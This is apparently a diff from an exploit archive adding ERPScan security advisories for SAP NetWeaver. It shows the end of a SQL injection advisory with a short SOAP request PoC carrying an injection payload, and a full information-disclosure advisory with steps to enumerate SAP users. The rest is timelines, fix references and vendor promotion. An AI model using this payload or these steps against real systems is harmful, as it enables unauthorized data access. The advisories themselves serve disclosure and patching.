+ + +7. TECHNICAL DESCRIPTION + +By exploiting this vulnerability, an internal or external attacker can +escalate their privileges. This access allows obtaining sensitive +technical and business-related information stored in the vulnerable +SAP system. + + +PoC + +POST /XXX/UDDISecurityImplBean HTTP/1.1 +Content-Type: text/xml + + + XXX + +x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or +'1'='1 + +XXX + + + + +8. REPORT TIMELINE + +Sent: 04.12.2015 +Reported: 04.12.2015 +Vendor response: 05.12.2015 +Date of Public Advisory: 09.02.2016 + + +9. REFERENCES + +https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/ + + +10. ABOUT ERPScan Research + +The company’s expertise is based on the research subdivision of +ERPScan, which is engaged in vulnerability research and analysis of +critical enterprise applications. It has achieved multiple +acknowledgments from the largest software vendors like SAP, Oracle, +Microsoft, IBM, VMware, HP for discovering more than 400 +vulnerabilities in their solutions (200 of them just in SAP!). + +ERPScan researchers are proud to have exposed new types of +vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be +nominated for the best server-side vulnerability at BlackHat 2013. + +ERPScan experts have been invited to speak, present, and train at 60+ +prime international security conferences in 25+ countries across the +continents. These include BlackHat, RSA, HITB, and private SAP +trainings in several Fortune 2000 companies. + +ERPScan researchers lead the project EAS-SEC, which is focused on +enterprise application security research and awareness. They have +published 3 exhaustive annual award-winning surveys about SAP +security. + +ERPScan experts have been interviewed by leading media resources and +featured in specialized info-sec publications worldwide. These include +Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, +Heise, and Chinabyte, to name a few. + +We have highly qualified experts in staff with experience in many +different fields of security, from web applications and +mobile/embedded to reverse engineering and ICS/SCADA systems, +accumulating their experience to conduct the best SAP security +research. + + +11. ABOUT ERPScan + +ERPScan is the most respected and credible Business Application +Security provider. Founded in 2010, the company operates globally and +enables large Oil and Gas, Financial and Retail organizations to +secure their mission-critical processes. Named as an ‘Emerging Vendor’ +in Security by CRN, listed among “TOP 100 SAP Solution providers” and +distinguished by 30+ other awards, ERPScan is the leading SAP SE +partner in discovering and resolving security vulnerabilities. ERPScan +consultants work with SAP SE in Walldorf to assist in improving the +security of their latest solutions. + +ERPScan’s primary mission is to close the gap between technical and +business security, and provide solutions to evaluate and secure SAP +and Oracle ERP systems and business-critical applications from both, +cyber-attacks as well as internal fraud. Usually our clients are large +enterprises, Fortune 2000 companies and managed service providers +whose requirements are to actively monitor and manage security of vast +SAP landscapes on a global scale. + +We ‘follow the sun’ and function in two hubs, located in the Palo Alto +and Amsterdam to provide threat intelligence services, agile support +and operate local offices and partner network spanning 20+ countries +around the globe. \ No newline at end of file diff --git a/platforms/xml/webapps/39841.txt b/platforms/xml/webapps/39841.txt new file mode 100755 index 000000000..e450a89f4 --- /dev/null +++ b/platforms/xml/webapps/39841.txt @@ -0,0 +1,159 @@ +Application:SAP NetWeaver AS JAVA +Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5 +Vendor URL: http://SAP.com +Bugs: information disclosure +Sent: 15.09.2015 +Reported: 15.09.2015 +Vendor response: 16.09.2015 +Date of Public Advisory: 09.02.2016 +Reference: SAP Security Note 2256846 +Author: Vahagn Vardanyan (ERPScan) + + +Description + +1. ADVISORY INFORMATION + +Title: SAP NetWeaver AS JAVA – information disclosure vulnerability +Advisory ID: [ERPSCAN-16-010] +Risk: Medium +Advisory URL: https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/ +Date published: 09.02.2016 +Vendors contacted: SAP + + +2. VULNERABILITY INFORMATION + +Class: Information disclosure +Impact: Resource consumption +Remotely Exploitable: Yes +Locally Exploitable: No +CVE: CVE-2016-2388 + +CVSS Information + +CVSS Base Score v3: 5.3 / 10 +CVSS Base Vector: +AV : Access Vector (Related exploit range) Network (N) +AC : Access Complexity (Required attack complexity) Low (L) +Au : Authentication (Level of authentication needed to exploit) None (N) +C : Impact to Confidentiality Low(N) +I : Impact to Integrity None(N) +A : Impact to Availability None (N) + + +3. VULNERABILITY DESCRIPTION + +Anonymous attacker can use a special HTTP request to get information +about SAP NetWeaver users. + + +4. VULNERABLE PACKAGES + +SAP NetWeaver AS JAVA 7.1- 7.5 + +Other versions are probably affected too, but they were not checked. + + +5. SOLUTIONS AND WORKAROUNDS + +To correct this vulnerability, install SAP Security Note 2256846 + + +6. AUTHOR + +Vahagn Vardanyan (ERPScan) + + +7. TECHNICAL DESCRIPTION + +An attacker can use Information disclosure vulnerability to reveal +additional information (system data, debugging information, etc) that +will help him to learn more about a system and to plan further +attacks. + + +Steps to exploit this vulnerability + +1. Open http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees# +page on SAP server + +2. Press "Choose" button + +3. In the opened window press “Search” + +You will get a list of SAP users + + +8. REPORT TIMELINE + +Sent: 15.09.2015 +Reported: 15.09.2015 +Vendor response: 16.09.2015 +Date of Public Advisory: 09.02.2016 + + +9. REFERENCES + +https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/ + + +10. ABOUT ERPScan Research + +The company’s expertise is based on the research subdivision of +ERPScan, which is engaged in vulnerability research and analysis of +critical enterprise applications. It has achieved multiple +acknowledgments from the largest software vendors like SAP, Oracle, +Microsoft, IBM, VMware, HP for discovering more than 400 +vulnerabilities in their solutions (200 of them just in SAP!). + +ERPScan researchers are proud to have exposed new types of +vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be +nominated for the best server-side vulnerability at BlackHat 2013. + +ERPScan experts have been invited to speak, present, and train at 60+ +prime international security conferences in 25+ countries across the +continents. These include BlackHat, RSA, HITB, and private SAP +trainings in several Fortune 2000 companies. + +ERPScan researchers lead the project EAS-SEC, which is focused on +enterprise application security research and awareness. They have +published 3 exhaustive annual award-winning surveys about SAP +security. + +ERPScan experts have been interviewed by leading media resources and +featured in specialized info-sec publications worldwide. These include +Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, +Heise, and Chinabyte, to name a few. + +We have highly qualified experts in staff with experience in many +different fields of security, from web applications and +mobile/embedded to reverse engineering and ICS/SCADA systems, +accumulating their experience to conduct the best SAP security +research. + + +11. ABOUT ERPScan + +ERPScan is the most respected and credible Business Application +Security provider. Founded in 2010, the company operates globally and +enables large Oil and Gas, Financial and Retail organizations to +secure their mission-critical processes. Named as an ‘Emerging Vendor’ +in Security by CRN, listed among “TOP 100 SAP Solution providers” and +distinguished by 30+ other awards, ERPScan is the leading SAP SE +partner in discovering and resolving security vulnerabilities. ERPScan +consultants work with SAP SE in Walldorf to assist in improving the +security of their latest solutions. + +ERPScan’s primary mission is to close the gap between technical and +business security, and provide solutions to evaluate and secure SAP +and Oracle ERP systems and business-critical applications from both, +cyber-attacks as well as internal fraud. Usually our clients are large +enterprises, Fortune 2000 companies and managed service providers +whose requirements are to actively monitor and manage security of vast +SAP landscapes on a global scale. + +We ‘follow the sun’ and function in two hubs, located in the Palo Alto +and Amsterdam to provide threat intelligence services, agile support +and operate local offices and partner network spanning 20+ countries +around the globe. \ No newline at end of file